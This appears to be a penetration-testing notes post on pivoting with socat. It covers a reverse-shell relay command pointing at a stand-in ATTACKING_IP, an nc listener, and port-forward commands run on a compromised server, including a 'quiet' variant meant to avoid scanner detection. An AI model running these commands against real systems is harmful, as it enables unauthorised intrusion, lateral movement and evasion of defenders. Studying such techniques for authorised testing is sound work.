---
title: Socat - Pivoting - Notes
date: 2022-07-01 00:00:00 +530
categories: [ Cyber Security Notes, Pivoting]
tags: [Notes, Pentesting, Pivoting, Socat, Relay, Proxy, Port Forward, Red Team]     # TAG names should always be lowercase
---

-------------------

Static binaries are easy to find for both [Linux](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) and [Windows](https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip/download). Bear in mind that the Windows version is unlikely to bypass Antivirus software by default, so custom compilation may be required.

-------------------

**Reverse Shell Relay**

In this scenario we are using socat to create a relay for us to send a reverse shell back to our own attacking machine (as in the diagram above). First let's start a standard netcat listener on our attacking box (`sudo nc -lvnp 443`). Next, on the compromised server, use the following command to start the relay:  
`./socat tcp-l:8000 tcp:ATTACKING_IP:443 &   `

_**Note:** the order of the two addresses matters here. Make sure to open the listening port first,_ then _connect back to the attacking machine._  

From here we can then create a reverse shell to the newly opened port 8000 on the compromised server.

A brief explanation of the above command:

-   `tcp-l:8000` is used to create the first half of the connection -- an IPv4 listener on tcp port 8000 of the target machine.
-   `tcp:ATTACKING_IP:443` connects back to our local IP on port 443. The ATTACKING_IP obviously needs to be filled in correctly for this to work.

-------------------

**Port Forwarding -- Easy**

The quick and easy way to set up a port forward with socat is quite simply to open up a listening port on the compromised server, and redirect whatever comes into it to the target server. For example, if the compromised server is 172.16.0.5 and the target is port 3306 of 172.16.0.10, we could use the following command (on the compromised server) to create a port forward:

`./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &   `

This opens up port 33060 on the compromised server and redirects the input from the attacking machine straight to the intended target server, essentially giving us access to the (presumably MySQL Database) running on our target of 172.16.0.10. The `fork` option is used to put every connection into a new process, and the `reuseaddr` option means that the port stays open after a connection is made to it. Combined, they allow us to use the same port forward for more than one connection. Once again we use `&` to background the shell, allowing us to keep using the same terminal session on the compromised server for other things.

-------------------

**Port Forwarding -- Quiet**

The previous technique is quick and easy, but it also opens up a port on the compromised server, which could potentially be spotted by any kind of host or network scanning. Whilst the risk is not _massive_, it pays to know a slightly quieter method of port forwarding with socat. This method is marginally more complex, but doesn't require opening up a port externally on the compromised server.

First of all, on our own attacking machine, we issue the following command:  
`socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &`

This opens up two ports: 8000 and 8001, creating a local port relay. What goes into one of them will come out of the other. For this reason, port 8000 also has the `fork` and `reuseaddr` options set, to allow us to create more than one connection using this port forward.

Next, on the compromised relay server (172.16.0.5 in the previous example) we execute this command:  
`./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &   `

This makes a connection between our listening port 8001 on the attacking machine, and the open port of the target server. To use the fictional network from before, we could enter this command as:  
`./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &   `

This would create a link between port 8000 on our attacking machine, and port 80 on the intended target (172.16.0.10), meaning that we could go to `localhost:8000` in our attacking machine's web browser to load the webpage served by the target: 172.16.0.10:80!